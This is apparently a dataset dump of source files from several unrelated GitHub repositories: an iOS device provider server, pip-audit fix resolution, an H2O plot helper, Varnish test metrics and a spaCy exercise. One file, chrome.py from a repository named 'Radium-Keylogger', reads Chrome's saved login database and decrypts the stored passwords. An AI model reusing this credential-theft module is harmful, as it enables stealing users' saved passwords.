max_stars_repo_path (string, 4–245 chars) | max_stars_repo_name (string, 7–115 chars) | max_stars_count (int64, 101–368k) | id (string, 2–8 chars) | content (string, 6–1.03M chars)
---|---|---|---|---|
acp/__main__.py | 6sibilings/daniel-Allen | 133 | 11194748 | <gh_stars>100-1000
import cli
cli.main()
|
Recoveries/chrome.py | Harot5001/Radium-Keylogger | 498 | 11194752 | <reponame>Harot5001/Radium-Keylogger
import sqlite3
import shutil
import win32crypt
import sys, os, platform
class Chrome():
def __init__(self):
pass
def run(self):
database_path = ''
if 'HOMEDRIVE' in os.environ and 'HOMEPATH' in os.environ:
# For Win7
path_Win7 = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH') + '\Local Settings\Application Data\Google\Chrome\User Data\Default\Login Data'
# For XP
path_XP = os.environ.get('HOMEDRIVE') + os.environ.get(
'HOMEPATH') + '\AppData\Local\Google\Chrome\User Data\Default\Login Data'
if os.path.exists(path_XP):
database_path = path_XP
elif os.path.exists(path_Win7):
database_path = path_Win7
else:
return
else:
return
# Copy database before to query it (bypass lock errors)
try:
shutil.copy(database_path, os.getcwd() + os.sep + 'tmp_db')
database_path = os.getcwd() + os.sep + 'tmp_db'
except Exception, e:
pass
# Connect to the Database
try:
conn = sqlite3.connect(database_path)
cursor = conn.cursor()
except Exception, e:
return
# Get the results
try:
cursor.execute('SELECT action_url, username_value, password_value FROM logins')
except:
return
pwdFound = []
for result in cursor.fetchall():
values = {}
try:
# Decrypt the Password
password = <PASSWORD>.CryptUnprotectData(result[2], None, None, None, 0)[1]
except Exception, e:
password = ''
if password:
values['Site'] = result[0]
values['Username'] = result[1]
values['Password'] = password
pwdFound.append(values)
conn.close()
if database_path.endswith('tmp_db'):
os.remove(database_path)
return pwdFound
#tem = Chrome()
#a = tem.run()
#print a |
h2o-py/h2o/model/extensions/varimp.py | MikolajBak/h2o-3 | 6,098 | 11194756 | from h2o.utils.ext_dependencies import get_matplotlib_pyplot
from h2o.utils.typechecks import assert_is_type
class VariableImportance:
def _varimp_plot(self, num_of_features=None, server=False):
"""
Plot the variable importance for a trained model.
:param num_of_features: the number of features shown in the plot (default is 10 or all if less than 10).
:param server: if true, set server settings for matplotlib and do not show the graph
:returns: None.
"""
assert_is_type(num_of_features, None, int)
assert_is_type(server, bool)
plt = get_matplotlib_pyplot(server)
if plt is None:
return
# get the variable importances as a list of tuples, do not use pandas dataframe
importances = self.varimp(use_pandas=False)
# features labels correspond to the first value of each tuple in the importances list
feature_labels = [tup[0] for tup in importances]
# relative (scaled) importances correspond to the third value of each tuple in the importances list
scaled_importances = [tup[2] for tup in importances]
# specify bar centers on the y axis, but flip the order so largest bar appears at top
pos = range(len(feature_labels))[::-1]
# specify the bar lengths
val = scaled_importances
# default to 10 or fewer features if num_of_features is not specified
if num_of_features is None:
num_of_features = min(len(val), 10)
fig, ax = plt.subplots(1, 1, figsize=(14, 10))
# create separate plot for the case where num_of_features == 1
if num_of_features == 1:
plt.barh(pos[0:num_of_features], val[0:num_of_features], align="center",
height=0.8, color="#1F77B4", edgecolor="none")
# Hide the right and top spines, color others grey
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_color("#7B7B7B")
ax.spines["left"].set_color("#7B7B7B")
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position("left")
ax.xaxis.set_ticks_position("bottom")
plt.yticks(pos[0:num_of_features], feature_labels[0:num_of_features])
ax.margins(None, 0.5)
else:
plt.barh(pos[0:num_of_features], val[0:num_of_features], align="center",
height=0.8, color="#1F77B4", edgecolor="none")
# Hide the right and top spines, color others grey
ax.spines["right"].set_visible(False)
ax.spines["top"].set_visible(False)
ax.spines["bottom"].set_color("#7B7B7B")
ax.spines["left"].set_color("#7B7B7B")
# Only show ticks on the left and bottom spines
ax.yaxis.set_ticks_position("left")
ax.xaxis.set_ticks_position("bottom")
plt.yticks(pos[0:num_of_features], feature_labels[0:num_of_features])
plt.ylim([min(pos[0:num_of_features])- 1, max(pos[0:num_of_features])+1])
# ax.margins(y=0.5)
# check which algorithm was used to select right plot title
plt.title("Variable Importance: H2O %s" % self._model_json["algo_full_name"], fontsize=20)
if not server:
plt.show()
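# Usage sketch (added for illustration, not part of the original module): the
# plot above is typically reached through the public wrapper on a trained H2O
# estimator that mixes in VariableImportance, e.g. (assuming `model` is a
# trained estimator with variable importances computed):
#
#   model.varimp_plot(num_of_features=15)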
|
main.py | eyotang/atxserver2-ios-provider | 103 | 11194757 | from __future__ import print_function
import argparse
import os
import shutil
import subprocess
import tempfile
import time
from collections import defaultdict
from concurrent.futures import ThreadPoolExecutor
from functools import partial
import requests
import tornado.web
from logzero import logger
from tornado import gen, httpclient, locks
from tornado.concurrent import run_on_executor
from tornado.httpclient import AsyncHTTPClient
from tornado.ioloop import IOLoop
from tornado.log import enable_pretty_logging
import heartbeat
import idb
from utils import current_ip
from typing import Union
idevices = {}
hbc = None
class CorsMixin(object):
CORS_ORIGIN = '*'
CORS_METHODS = 'GET,POST,OPTIONS'
CORS_CREDENTIALS = True
CORS_HEADERS = "x-requested-with,authorization"
def set_default_headers(self):
self.set_header("Access-Control-Allow-Origin", self.CORS_ORIGIN)
self.set_header("Access-Control-Allow-Headers", self.CORS_HEADERS)
self.set_header('Access-Control-Allow-Methods', self.CORS_METHODS)
def options(self):
# no body
self.set_status(204)
self.finish()
class MainHandler(tornado.web.RequestHandler):
@gen.coroutine
def get(self):
yield gen.sleep(.5)
self.write("Hello, world")
class ProxyTesterhomeHandler(tornado.web.RequestHandler):
@gen.coroutine
def get(self):
body = yield self.get_testerhome()
self.write(body)
@gen.coroutine
def get_testerhome(self):
http_client = AsyncHTTPClient()
response = yield http_client.fetch("https://testerhome.com/")
raise gen.Return(response.body)
class ColdingHandler(tornado.web.RequestHandler):
""" reset device to clean state """
async def post(self, udid=None):
udid = udid or self.get_argument('udid', None)
assert udid
d = idevices.get(udid)
try:
if not d:
raise Exception("Device not found")
d.restart_wda_proxy() # change wda public port
wda_url = "http://{}:{}".format(current_ip(), d.public_port)
await d.wda_healthcheck()
await hbc.device_update({
"udid": udid,
"colding": False,
"provider": {
"wdaUrl": wda_url,
}
})
self.write({
"success": True,
"description": "Device successfully colded"
})
except Exception as e:
logger.warning("colding procedure got error: %s", e)
self.set_status(400) # bad request
self.write({
"success": False,
"description": "udid: %s not found" % udid
})
class AppInstallHandler(CorsMixin, tornado.web.RequestHandler):
executor = ThreadPoolExecutor(4)
@run_on_executor(executor='executor')
def app_install(self, udid: str, url: str):
try:
r = requests.get(url, stream=True)
if r.status_code != 200:
return {"success": False, "description": r.reason}
except Exception as e:
return {"success": False, "description": str(e)}
# tempfile.
logger.debug("%s app-install from %s", udid[:7], url)
tfile = tempfile.NamedTemporaryFile(suffix=".ipa",
prefix="tmpfile-",
dir=os.getcwd())
try:
ipa_path = tfile.name
logger.debug("%s temp ipa path: %s", udid[:7], ipa_path)
# try:
# with open(ipa_path, "wb") as tfile:
content_length = int(r.headers.get("content-length", 0))
if content_length:
for chunk in r.iter_content(chunk_size=40960):
tfile.write(chunk)
else:
shutil.copyfileobj(r.raw, tfile)
p = subprocess.Popen(
["ideviceinstaller", "-u", udid, "-i", ipa_path],
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
output = ""
for line in p.stdout:
line = line.decode('utf-8')
logger.debug("%s -- %s", udid[:7], line.strip())
output += line
success = "Complete" in output
exit_code = p.wait()
if not success:
return {"success": False, "description": output}
return {
"success": success,
# "bundleId": bundle_id,
"return": exit_code,
"output": output
}
except Exception as e:
return {"success": False, "status": 500, "description": str(e)}
finally:
tfile.close()
@gen.coroutine
def post(self):
udid = self.get_argument("udid")
url = self.get_argument("url")
device = idevices[udid]
ret = yield self.app_install(device.udid, url)
if not ret['success']:
self.set_status(ret.get("status", 400)) # default bad request
self.write(ret)
def make_app(**settings):
settings['template_path'] = 'templates'
settings['static_path'] = 'static'
settings['cookie_secret'] = os.environ.get("SECRET", "SECRET:_")
settings['login_url'] = '/login'
return tornado.web.Application([
(r"/", MainHandler),
(r"/testerhome", ProxyTesterhomeHandler),
(r"/devices/([^/]+)/cold", ColdingHandler),
(r"/devices/([^/]+)/app/install", AppInstallHandler),
(r"/cold", ColdingHandler),
(r"/app/install", AppInstallHandler),
], **settings)
async def _device_callback(d: idb.WDADevice,
status: str,
info: Union[dict, None] = None):
""" monitor device status """
wd = idb.WDADevice
if status == wd.status_preparing:
await hbc.device_update({
"udid": d.udid,
"provider": None, # no provider indicate not present
"colding": False,
"properties": {
"name": d.name,
"product": d.product,
"brand": "Apple",
}
})
elif status == wd.status_ready:
logger.debug("%s %s", d, "healthcheck passed")
assert isinstance(info, dict)
info = defaultdict(dict, info)
await hbc.device_update({
# "colding": False,
"udid": d.udid,
"provider": {
"wdaUrl": "http://{}:{}".format(current_ip(), d.public_port)
},
"properties": {
"ip": info['value']['ios']['ip'],
"version": info['value']['os']['version'],
"sdkVersion": info['value']['os']['sdkVersion'],
}
}) # yapf: disable
elif status == wd.status_fatal:
await hbc.device_update({
"udid": d.udid,
"provider": None,
})
else:
logger.error("Unknown status: %s", status)
async def device_watch(wda_directory: str, manually_start_wda: bool, use_tidevice: bool, wda_bundle_pattern: bool):
"""
When an iOS device is plugged in, launch WDA
"""
lock = locks.Lock() # WDA launch one by one
async for event in idb.track_devices():
if event.udid.startswith("ffffffffffffffffff"):
logger.debug("Invalid event: %s", event)
continue
logger.debug("Event: %s", event)
if event.present:
d = idb.WDADevice(event.udid, lock=lock, callback=_device_callback)
d.wda_directory = wda_directory
d.manually_start_wda = manually_start_wda
d.use_tidevice = use_tidevice
d.wda_bundle_pattern = wda_bundle_pattern
idevices[event.udid] = d
d.start()
else: # offline
await idevices[event.udid].stop()
idevices.pop(event.udid)
async def async_main():
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument('-d',
'--debug',
action="store_true",
help="enable debug mode")
parser.add_argument('-p',
'--port',
type=int,
default=3600,
help='listen port')
parser.add_argument("-s",
"--server",
type=str,
default="localhost:4000",
required=False,
help="server address")
parser.add_argument("-W",
"--wda-directory",
default="./WebDriverAgent",
help="WebDriverAgent source directory")
parser.add_argument("--manually-start-wda",
action="store_true",
help="Start wda manually like using tidevice(with xctest). Then atx won't start WebDriverAgent")
parser.add_argument("--use-tidevice",
action="store_true",
help="Start wda automatically using tidevice command. Only works when not using manually-start-wda")
parser.add_argument("--wda-bundle-pattern",
type=str,
default="*WebDriverAgent*",
required=False,
help="If using --use-tidevice, can override wda bundle name pattern manually")
args = parser.parse_args()
# start server
enable_pretty_logging()
app = make_app(debug=args.debug)
app.listen(args.port)
global hbc
self_url = "http://{}:{}".format(current_ip(), args.port)
server_addr = args.server.replace("http://", "").replace("/", "")
hbc = await heartbeat.heartbeat_connect(server_addr,
platform='apple',
self_url=self_url)
await device_watch(args.wda_directory, args.manually_start_wda, args.use_tidevice, args.wda_bundle_pattern)
if __name__ == "__main__":
try:
IOLoop.current().run_sync(async_main)
# IOLoop.instance().start()
except KeyboardInterrupt:
IOLoop.instance().stop()
for d in idevices.values():
d.destroy()
|
pip_audit/_fix.py | pombredanne/pip-audit | 447 | 11194763 | <reponame>pombredanne/pip-audit<filename>pip_audit/_fix.py
"""
Functionality for resolving fixed versions of dependencies.
"""
import logging
from dataclasses import dataclass
from typing import Dict, Iterator, List, cast
from packaging.version import Version
from pip_audit._service import (
Dependency,
ResolvedDependency,
VulnerabilityResult,
VulnerabilityService,
)
from pip_audit._state import AuditState
logger = logging.getLogger(__name__)
@dataclass(frozen=True)
class FixVersion:
"""
Represents an abstract dependency fix version.
This class cannot be constructed directly.
"""
dep: ResolvedDependency
def __init__(self, *_args, **_kwargs) -> None: # pragma: no cover
"""
A stub constructor that always fails.
"""
raise NotImplementedError
def is_skipped(self) -> bool:
"""
Check whether the `FixVersion` was unable to be resolved.
"""
return self.__class__ is SkippedFixVersion
@dataclass(frozen=True)
class ResolvedFixVersion(FixVersion):
"""
Represents a resolved fix version.
"""
version: Version
@dataclass(frozen=True)
class SkippedFixVersion(FixVersion):
"""
Represents a fix version that could not be resolved and was therefore skipped.
"""
skip_reason: str
def resolve_fix_versions(
service: VulnerabilityService,
result: Dict[Dependency, List[VulnerabilityResult]],
state: AuditState = AuditState(),
) -> Iterator[FixVersion]:
"""
Resolves a mapping of dependencies to known vulnerabilities to a series of fix versions without
known vulnerabilities.
"""
for (dep, vulns) in result.items():
if dep.is_skipped():
continue
if not vulns:
continue
dep = cast(ResolvedDependency, dep)
try:
version = _resolve_fix_version(service, dep, vulns, state)
yield ResolvedFixVersion(dep, version)
except FixResolutionImpossible as fri:
skip_reason = str(fri)
logger.debug(skip_reason)
yield SkippedFixVersion(dep, skip_reason)
def _resolve_fix_version(
service: VulnerabilityService,
dep: ResolvedDependency,
vulns: List[VulnerabilityResult],
state: AuditState,
) -> Version:
# We need to upgrade to a fix version that satisfies all vulnerability results
#
# However, whenever we upgrade a dependency, we run the risk of introducing new vulnerabilities
# so we need to run this in a loop and continue polling the vulnerability service on each
# prospective resolved fix version
current_version = dep.version
current_vulns = vulns
while current_vulns:
state.update_state(f"Resolving fix version for {dep.name}, checking {current_version}")
def get_earliest_fix_version(d: ResolvedDependency, v: VulnerabilityResult) -> Version:
for fix_version in v.fix_versions:
if fix_version > current_version:
return fix_version
raise FixResolutionImpossible(
f"failed to fix dependency {dep.name} ({dep.version}), unable to find fix version "
f"for vulnerability {v.id}"
)
# We want to retrieve a version that potentially fixes all vulnerabilities
current_version = max([get_earliest_fix_version(dep, v) for v in current_vulns])
_, current_vulns = service.query(ResolvedDependency(dep.name, current_version))
return current_version
class FixResolutionImpossible(Exception):
"""
Raised when `resolve_fix_versions` fails to find a fix version without known vulnerabilities
"""
pass
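# Usage sketch (added for illustration, not part of the original module):
# assuming `service` is some concrete VulnerabilityService implementation and
# `result` is the Dict[Dependency, List[VulnerabilityResult]] mapping produced
# by an audit, fix versions could be resolved roughly like this:
#
#   for fix in resolve_fix_versions(service, result):
#       if fix.is_skipped():
#           print(f"skipped {fix.dep.name}: {fix.skip_reason}")
#       else:
#           print(f"{fix.dep.name}: upgrade to {fix.version}")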
|
common/__init__.py | apple/ml-cvnets | 209 | 11194764 | <reponame>apple/ml-cvnets<filename>common/__init__.py<gh_stars>100-1000
#
# For licensing see accompanying LICENSE file.
# Copyright (C) 2022 Apple Inc. All Rights Reserved.
#
SUPPORTED_IMAGE_EXTNS = [".png", ".jpg", ".jpeg"] # Add image formats here
SUPPORTED_MODALITIES = ["image", "video"]
SUPPORTED_VIDEO_CLIP_VOTING_FN = ["sum", "max"]
SUPPORTED_VIDEO_READER = ["pyav", "decord"]
DEFAULT_IMAGE_WIDTH = DEFAULT_IMAGE_HEIGHT = 256
DEFAULT_IMAGE_CHANNELS = 3
DEFAULT_VIDEO_FRAMES = 8
DEFAULT_LOG_FREQ = 500
DEFAULT_ITERATIONS = 300000
DEFAULT_EPOCHS = 300
DEFAULT_MAX_ITERATIONS = DEFAULT_MAX_EPOCHS = 10000000
TMP_RES_FOLDER = "results_tmp"
TMP_CACHE_LOC = "/tmp"
|
varnish/tests/common.py | mchelen-gov/integrations-core | 663 | 11194771 | # (C) Datadog, Inc. 2018-present
# All rights reserved
# Licensed under a 3-clause BSD style license (see LICENSE)
import os
# This is a small extract of metrics from varnish. This is meant to test that
# the check gathers metrics. Since the check returns everything from varnish
# without any selection/renaming, there is no point in having a complete list.
COMMON_METRICS = [
"varnish.uptime", # metrics where the "MAIN" prefix was removed
"varnish.sess_conn", # metrics where the "MAIN" prefix was removed
"varnish.sess_fail", # metrics where the "MAIN" prefix was removed
"varnish.client_req_400", # metrics where the "MAIN" prefix was removed
"varnish.client_req_417", # metrics where the "MAIN" prefix was removed
"varnish.client_req", # metrics where the "MAIN" prefix was removed
"varnish.cache_hit", # metrics where the "MAIN" prefix was removed
"varnish.cache_hitpass", # metrics where the "MAIN" prefix was removed
"varnish.cache_miss", # metrics where the "MAIN" prefix was removed
"varnish.backend_conn", # metrics where the "MAIN" prefix was removed
"varnish.backend_unhealthy", # metrics where the "MAIN" prefix was removed
"varnish.backend_busy", # metrics where the "MAIN" prefix was removed
"varnish.fetch_eof", # metrics where the "MAIN" prefix was removed
"varnish.fetch_bad", # metrics where the "MAIN" prefix was removed
"varnish.fetch_none", # metrics where the "MAIN" prefix was removed
"varnish.fetch_1xx", # metrics where the "MAIN" prefix was removed
"varnish.pools", # metrics where the "MAIN" prefix was removed
"varnish.busy_sleep", # metrics where the "MAIN" prefix was removed
"varnish.busy_wakeup", # metrics where the "MAIN" prefix was removed
"varnish.busy_killed", # metrics where the "MAIN" prefix was removed
"varnish.sess_queued", # metrics where the "MAIN" prefix was removed
"varnish.sess_dropped", # metrics where the "MAIN" prefix was removed
"varnish.n_object", # metrics where the "MAIN" prefix was removed
"varnish.n_vampireobject", # metrics where the "MAIN" prefix was removed
"varnish.n_vcl", # metrics where the "MAIN" prefix was removed
"varnish.n_vcl_avail", # metrics where the "MAIN" prefix was removed
"varnish.n_vcl_discard", # metrics where the "MAIN" prefix was removed
"varnish.bans", # metrics where the "MAIN" prefix was removed
"varnish.bans_completed", # metrics where the "MAIN" prefix was removed
"varnish.bans_obj", # metrics where the "MAIN" prefix was removed
"varnish.bans_req", # metrics where the "MAIN" prefix was removed
"varnish.MGT.child_start",
"varnish.MGT.child_exit",
"varnish.MGT.child_stop",
"varnish.MEMPOOL.busyobj.live",
"varnish.MEMPOOL.busyobj.pool",
"varnish.MEMPOOL.busyobj.allocs",
"varnish.MEMPOOL.busyobj.frees",
"varnish.SMA.s0.c_req",
"varnish.SMA.s0.c_fail",
"varnish.SMA.Transient.c_req",
"varnish.SMA.Transient.c_fail",
"varnish.VBE.boot.default.req",
"varnish.LCK.backend.creat",
"varnish.LCK.ban.creat",
"varnish.LCK.ban.locks",
"varnish.LCK.busyobj.creat",
"varnish.LCK.mempool.creat",
"varnish.LCK.vbe.creat",
"varnish.LCK.vbe.destroy",
"varnish.LCK.vcl.creat",
"varnish.LCK.vcl.destroy",
"varnish.LCK.vcl.locks",
"varnish.n_purges",
"varnish.LCK.backend.destroy",
"varnish.LCK.backend.locks",
"varnish.LCK.ban.destroy",
"varnish.LCK.busyobj.destroy",
"varnish.LCK.busyobj.locks",
"varnish.LCK.cli.creat",
"varnish.LCK.cli.destroy",
"varnish.LCK.cli.locks",
"varnish.LCK.exp.creat",
"varnish.LCK.exp.destroy",
"varnish.LCK.exp.locks",
"varnish.LCK.hcb.creat",
"varnish.LCK.hcb.destroy",
"varnish.LCK.hcb.locks",
"varnish.LCK.lru.creat",
"varnish.LCK.lru.destroy",
"varnish.LCK.lru.locks",
"varnish.LCK.mempool.destroy",
"varnish.LCK.mempool.locks",
"varnish.LCK.objhdr.creat",
"varnish.LCK.objhdr.destroy",
"varnish.LCK.objhdr.locks",
"varnish.LCK.pipestat.creat",
"varnish.LCK.pipestat.destroy",
"varnish.LCK.pipestat.locks",
"varnish.LCK.sess.creat",
"varnish.LCK.sess.destroy",
"varnish.LCK.sess.locks",
"varnish.LCK.sma.creat",
"varnish.LCK.sma.destroy",
"varnish.LCK.sma.locks",
"varnish.LCK.vbe.locks",
"varnish.LCK.vcapace.creat",
"varnish.LCK.vcapace.destroy",
"varnish.LCK.vcapace.locks",
"varnish.LCK.vxid.creat",
"varnish.LCK.vxid.destroy",
"varnish.LCK.vxid.locks",
"varnish.LCK.waiter.creat",
"varnish.LCK.waiter.destroy",
"varnish.LCK.waiter.locks",
"varnish.LCK.wq.creat",
"varnish.LCK.wq.destroy",
"varnish.LCK.wq.locks",
"varnish.LCK.wstat.creat",
"varnish.LCK.wstat.destroy",
"varnish.LCK.wstat.locks",
"varnish.MEMPOOL.busyobj.randry",
"varnish.MEMPOOL.busyobj.recycle",
"varnish.MEMPOOL.busyobj.surplus",
"varnish.MEMPOOL.busyobj.sz_actual",
"varnish.MEMPOOL.busyobj.sz_wanted",
"varnish.MEMPOOL.busyobj.timeout",
"varnish.MEMPOOL.busyobj.toosmall",
"varnish.MEMPOOL.req0.allocs",
"varnish.MEMPOOL.req0.frees",
"varnish.MEMPOOL.req0.live",
"varnish.MEMPOOL.req0.pool",
"varnish.MEMPOOL.req0.randry",
"varnish.MEMPOOL.req0.recycle",
"varnish.MEMPOOL.req0.surplus",
"varnish.MEMPOOL.req0.sz_actual",
"varnish.MEMPOOL.req0.sz_wanted",
"varnish.MEMPOOL.req0.timeout",
"varnish.MEMPOOL.req0.toosmall",
"varnish.MEMPOOL.req1.allocs",
"varnish.MEMPOOL.req1.frees",
"varnish.MEMPOOL.req1.live",
"varnish.MEMPOOL.req1.pool",
"varnish.MEMPOOL.req1.randry",
"varnish.MEMPOOL.req1.recycle",
"varnish.MEMPOOL.req1.surplus",
"varnish.MEMPOOL.req1.sz_actual",
"varnish.MEMPOOL.req1.sz_wanted",
"varnish.MEMPOOL.req1.timeout",
"varnish.MEMPOOL.req1.toosmall",
"varnish.MEMPOOL.sess0.allocs",
"varnish.MEMPOOL.sess0.frees",
"varnish.MEMPOOL.sess0.live",
"varnish.MEMPOOL.sess0.pool",
"varnish.MEMPOOL.sess0.randry",
"varnish.MEMPOOL.sess0.recycle",
"varnish.MEMPOOL.sess0.surplus",
"varnish.MEMPOOL.sess0.sz_actual",
"varnish.MEMPOOL.sess0.sz_wanted",
"varnish.MEMPOOL.sess0.timeout",
"varnish.MEMPOOL.sess0.toosmall",
"varnish.MEMPOOL.sess1.allocs",
"varnish.MEMPOOL.sess1.frees",
"varnish.MEMPOOL.sess1.live",
"varnish.MEMPOOL.sess1.pool",
"varnish.MEMPOOL.sess1.randry",
"varnish.MEMPOOL.sess1.recycle",
"varnish.MEMPOOL.sess1.surplus",
"varnish.MEMPOOL.sess1.sz_actual",
"varnish.MEMPOOL.sess1.sz_wanted",
"varnish.MEMPOOL.sess1.timeout",
"varnish.MEMPOOL.sess1.toosmall",
"varnish.MGT.child_died",
"varnish.MGT.child_dump",
"varnish.MGT.child_panic",
"varnish.MGT.uptime",
"varnish.SMA.Transient.c_bytes",
"varnish.SMA.Transient.c_freed",
"varnish.SMA.Transient.g_alloc",
"varnish.SMA.Transient.g_bytes",
"varnish.SMA.Transient.g_space",
"varnish.SMA.s0.c_bytes",
"varnish.SMA.s0.c_freed",
"varnish.SMA.s0.g_alloc",
"varnish.SMA.s0.g_bytes",
"varnish.SMA.s0.g_space",
"varnish.backend_fail",
"varnish.backend_recycle",
"varnish.backend_req",
"varnish.backend_retry",
"varnish.backend_reuse",
"varnish.bans_added",
"varnish.bans_deleted",
"varnish.bans_dups",
"varnish.bans_lurker_contention",
"varnish.bans_lurker_obj_killed",
"varnish.bans_lurker_obj_killed_cutoff",
"varnish.bans_lurker_tested",
"varnish.bans_lurker_tests_tested",
"varnish.bans_obj_killed",
"varnish.bans_persisted_bytes",
"varnish.bans_persisted_fragmentation",
"varnish.bans_tested",
"varnish.bans_tests_tested",
"varnish.cache_hitmiss",
"varnish.esi_errors",
"varnish.esi_warnings",
"varnish.exp_mailed",
"varnish.exp_received",
"varnish.fetch_204",
"varnish.fetch_304",
"varnish.fetch_chunked",
"varnish.fetch_failed",
"varnish.fetch_head",
"varnish.fetch_length",
"varnish.fetch_no_thread",
"varnish.hcb_insert",
"varnish.hcb_lock",
"varnish.hcb_nolock",
"varnish.losthdr",
"varnish.n_backend",
"varnish.n_expired",
"varnish.n_gunzip",
"varnish.n_gzip",
"varnish.n_lru_moved",
"varnish.n_lru_nuked",
"varnish.n_obj_purged",
"varnish.n_objectcore",
"varnish.n_objecthead",
"varnish.n_test_gunzip",
"varnish.req_dropped",
"varnish.s_fetch",
"varnish.s_pass",
"varnish.s_pipe",
"varnish.s_pipe_hdrbytes",
"varnish.s_pipe_in",
"varnish.s_pipe_out",
"varnish.s_req_bodybytes",
"varnish.s_req_hdrbytes",
"varnish.s_resp_bodybytes",
"varnish.s_resp_hdrbytes",
"varnish.s_sess",
"varnish.s_synth",
"varnish.sc_overload",
"varnish.sc_pipe_overflow",
"varnish.sc_range_short",
"varnish.sc_rem_close",
"varnish.sc_req_close",
"varnish.sc_req_http10",
"varnish.sc_req_http20",
"varnish.sc_resp_close",
"varnish.sc_rx_bad",
"varnish.sc_rx_body",
"varnish.sc_rx_junk",
"varnish.sc_rx_overflow",
"varnish.sc_rx_timeout",
"varnish.sc_tx_eof",
"varnish.sc_tx_error",
"varnish.sc_tx_pipe",
"varnish.sc_vcl_failure",
"varnish.sess_closed",
"varnish.sess_closed_err",
"varnish.sess_herd",
"varnish.sess_readahead",
"varnish.shm_cont",
"varnish.shm_cycles",
"varnish.shm_flushes",
"varnish.shm_records",
"varnish.shm_writes",
"varnish.summs",
"varnish.thread_queue_len",
"varnish.threads",
"varnish.threads_created",
"varnish.threads_destroyed",
"varnish.threads_failed",
"varnish.threads_limited",
"varnish.vcl_fail",
"varnish.vmods",
"varnish.VBE.boot.default.bereq_bodybytes",
"varnish.VBE.boot.default.bereq_hdrbytes",
"varnish.VBE.boot.default.beresp_bodybytes",
"varnish.VBE.boot.default.beresp_hdrbytes",
"varnish.VBE.boot.default.conn",
"varnish.VBE.boot.default.pipe_hdrbytes",
"varnish.VBE.boot.default.pipe_in",
"varnish.VBE.boot.default.pipe_out",
]
METRICS_5 = [
"varnish.sess_drop", # metrics where the "MAIN" prefix was removed
"varnish.LCK.backend_tcp.creat",
"varnish.LCK.backend_tcp.destroy",
"varnish.LCK.backend_tcp.locks",
# This is a rate that is artificially emitted with the same value as varnish.n_purges
# which is a gauge in versions <=5
"varnish.n_purgesps",
]
METRICS_6 = [
"varnish.LCK.backend.dbg_busy",
"varnish.LCK.tcp_pool.creat",
"varnish.LCK.tcp_pool.destroy",
"varnish.LCK.tcp_pool.locks",
"varnish.LCK.ban.dbg_busy",
"varnish.LCK.ban.dbg_try_fail",
"varnish.LCK.backend.dbg_try_fail",
"varnish.LCK.busyobj.dbg_busy",
"varnish.LCK.busyobj.dbg_try_fail",
"varnish.LCK.cli.dbg_busy",
"varnish.LCK.cli.dbg_try_fail",
"varnish.LCK.exp.dbg_busy",
"varnish.LCK.exp.dbg_try_fail",
"varnish.LCK.hcb.dbg_busy",
"varnish.LCK.hcb.dbg_try_fail",
"varnish.LCK.lru.dbg_busy",
"varnish.LCK.lru.dbg_try_fail",
"varnish.LCK.mempool.dbg_busy",
"varnish.LCK.mempool.dbg_try_fail",
"varnish.LCK.objhdr.dbg_busy",
"varnish.LCK.objhdr.dbg_try_fail",
"varnish.LCK.perpool.destroy",
"varnish.LCK.perpool.locks",
"varnish.LCK.perpool.creat",
"varnish.LCK.perpool.dbg_busy",
"varnish.LCK.perpool.dbg_try_fail",
"varnish.LCK.pipestat.dbg_busy",
"varnish.LCK.pipestat.dbg_try_fail",
"varnish.LCK.probe.creat",
"varnish.LCK.probe.destroy",
"varnish.LCK.probe.locks",
"varnish.LCK.probe.dbg_busy",
"varnish.LCK.probe.dbg_try_fail",
"varnish.LCK.sess.dbg_busy",
"varnish.LCK.sess.dbg_try_fail",
"varnish.LCK.sma.dbg_busy",
"varnish.LCK.sma.dbg_try_fail",
"varnish.LCK.tcp_pool.dbg_busy",
"varnish.LCK.tcp_pool.dbg_try_fail",
"varnish.LCK.vcapace.dbg_busy",
"varnish.LCK.vcapace.dbg_try_fail",
"varnish.LCK.vbe.dbg_busy",
"varnish.LCK.vbe.dbg_try_fail",
"varnish.LCK.vcl.dbg_busy",
"varnish.LCK.vcl.dbg_try_fail",
"varnish.LCK.vxid.dbg_busy",
"varnish.LCK.vxid.dbg_try_fail",
"varnish.LCK.waiter.dbg_busy",
"varnish.LCK.waiter.dbg_try_fail",
"varnish.LCK.wq.dbg_busy",
"varnish.LCK.wq.dbg_try_fail",
"varnish.LCK.wstat.dbg_busy",
"varnish.LCK.wstat.dbg_try_fail",
"varnish.VBE.boot.default.busy",
"varnish.VBE.boot.default.fail",
"varnish.VBE.boot.default.fail_eacces",
"varnish.VBE.boot.default.fail_eaddrnotavail",
"varnish.VBE.boot.default.fail_econnrefused",
"varnish.VBE.boot.default.fail_enetunreach",
"varnish.VBE.boot.default.fail_etimedout",
"varnish.VBE.boot.default.fail_other",
"varnish.VBE.boot.default.helddown",
"varnish.VBE.boot.default.unhealthy",
"varnish.beresp_shortlived",
"varnish.beresp_uncacheable",
"varnish.cache_hit_grace",
"varnish.client_resp_500",
"varnish.n_lru_limited",
"varnish.n_pipe",
"varnish.pipe_limited",
"varnish.sc_rx_close_idle",
"varnish.sess_fail_ebadf",
"varnish.sess_fail_econnaborted",
"varnish.sess_fail_eintr",
"varnish.sess_fail_emfile",
"varnish.sess_fail_enomem",
"varnish.sess_fail_other",
"varnish.ws_backend_overflow",
"varnish.ws_client_overflow",
"varnish.ws_session_overflow",
"varnish.ws_thread_overflow",
]
VARNISHADM_PATH = "varnishadm"
SECRETFILE_PATH = "secretfile"
DAEMON_ADDRESS = "localhost:6082"
HERE = os.path.join(os.path.dirname(__file__))
FIXTURE_DIR = os.path.join(HERE, "fixtures")
CHECK_NAME = "varnish"
VARNISH_VERSION = os.getenv('VARNISH_VERSION')
def get_config_by_version(name=None):
config = {"varnishstat": get_varnish_stat_path(), "tags": ["varnish_cluster:webs"]}
if name:
config["name"] = name
return config
def get_varnish_stat_path():
return "docker exec ci_varnish varnishstat"
|
exercises/en/solution_02_06.py | Jette16/spacy-course | 2,085 | 11194785 | <filename>exercises/en/solution_02_06.py
from spacy.lang.en import English
nlp = English()
# Import the Doc and Span classes
from spacy.tokens import Doc, Span
words = ["I", "like", "David", "Bowie"]
spaces = [True, True, True, False]
# Create a doc from the words and spaces
